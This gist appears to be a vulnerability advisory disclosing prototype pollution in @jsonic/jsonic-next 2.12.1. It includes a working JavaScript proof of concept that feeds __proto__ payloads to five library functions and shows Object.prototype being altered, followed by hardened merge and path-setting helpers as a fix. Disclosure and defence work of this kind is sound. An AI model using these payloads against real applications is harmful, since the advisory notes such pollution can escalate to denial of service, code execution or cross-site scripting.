
@mestrtee
Created June 17, 2024 17:11
Vulnerability Advisory

Vulnerability type: Prototype Pollution

Vendor of the Package: rjrodger

Affected Package:

  • Product: @jsonic/jsonic-next
  • Version: 2.12.1

Affected component(s):

empty, util.clone, util.prop, util.deep, make

Attack vector(s): an attacker can modify the built-in Object.prototype by calling one of the vulnerable functions (empty, util.clone, util.prop, util.deep, make) with an argument containing the special property __proto__. The resulting pollution of application logic can be escalated to denial of service, remote code execution or cross-site scripting attacks.

Description: Affected versions of this package are vulnerable to Prototype Pollution through the vulnerable functions empty, util.clone, util.prop, util.deep and make. An attacker can alter the behavior of all objects inheriting from the affected prototype by passing arguments crafted with the built-in property __proto__ to these functions. Depending on the gadgets reachable by the attack, it can potentially be escalated to denial of service, remote code execution or cross-site scripting attacks.

Proof-of-Concept:

(async () => {
  const lib = await import('@jsonic/jsonic-next');

  var victim = {};
  var emptyObj = {}; // target object for util.prop / util.deep

  console.log("Before Attack: ", JSON.stringify(victim.__proto__));

  try {
    // Each call receives a payload whose __proto__ key reaches Object.prototype
    lib.empty(JSON.parse('{"__proto__":{"test":123}}'));
    lib.util.clone(JSON.parse('{"__proto__":{"test":123}}'));
    lib.util.prop(emptyObj, "__proto__.test", 123);
    lib.util.deep(emptyObj, JSON.parse('{"__proto__":{"test":123}}'));
    lib.make(JSON.parse('{"__proto__":{"test":123}}'));
  } catch (e) { }

  console.log("After Attack: ", JSON.stringify(victim.__proto__));

  // Remove the property the payload added to Object.prototype
  delete Object.prototype.test;
})();
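For comparison, a hardened counterpart is added here as an example; it is not code from the advisory or from the jsonic project. The hypothetical helpers safeDeepMerge and safeSetPath mirror what util.deep and util.prop do, but walk only own keys and refuse the segments a __proto__ payload relies on, and runHardened checks them against the same constructed payload the PoC uses.

```javascript
// Hypothetical hardened helpers, not code from @jsonic/jsonic-next.
// Keys through which a payload can reach Object.prototype.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
const isPlainObject = (v) => v !== null && typeof v === 'object' && !Array.isArray(v);
const hasOwn = (o, k) => Object.prototype.hasOwnProperty.call(o, k);

// Deep-merge src into dst, walking only own keys and dropping forbidden
// ones, so "__proto__" is never used as a write target.
function safeDeepMerge(dst, src) {
  for (const key of Object.keys(src)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const val = src[key];
    if (isPlainObject(val)) {
      if (!hasOwn(dst, key) || !isPlainObject(dst[key])) dst[key] = {};
      safeDeepMerge(dst[key], val);
    } else {
      dst[key] = val;
    }
  }
  return dst;
}

// Set a dotted path such as "a.b.c"; refuse any segment that would step
// onto the prototype chain instead of an own property.
function safeSetPath(obj, path, value) {
  const parts = path.split('.');
  if (parts.some((p) => FORBIDDEN_KEYS.has(p))) {
    throw new Error('refusing reserved key in path: ' + path);
  }
  let cur = obj;
  for (const p of parts.slice(0, -1)) {
    if (!hasOwn(cur, p) || !isPlainObject(cur[p])) cur[p] = {};
    cur = cur[p];
  }
  cur[parts[parts.length - 1]] = value;
  return obj;
}

// Constructed payload, the same shape the advisory's PoC passes in.
const PAYLOAD = '{"__proto__":{"test":123}}';
// Feed the payload to both helpers and report whether Object.prototype
// picked up "test"; a correct implementation leaves polluted === false.
function runHardened() {
  const merged = safeDeepMerge({}, JSON.parse(PAYLOAD));
  let pathRejected = false;
  try { safeSetPath({}, '__proto__.test', 123); } catch (e) { pathRejected = true; }
  return { polluted: hasOwn(Object.prototype, 'test'), mergedKeys: Object.keys(merged), pathRejected };
}

console.log(runHardened()); // { polluted: false, mergedKeys: [], pathRejected: true }
```

The key-list check is the minimum; wrapping parsed input in Object.create(null) or freezing Object.prototype at startup are complementary defences when the code base cannot be audited for every merge site.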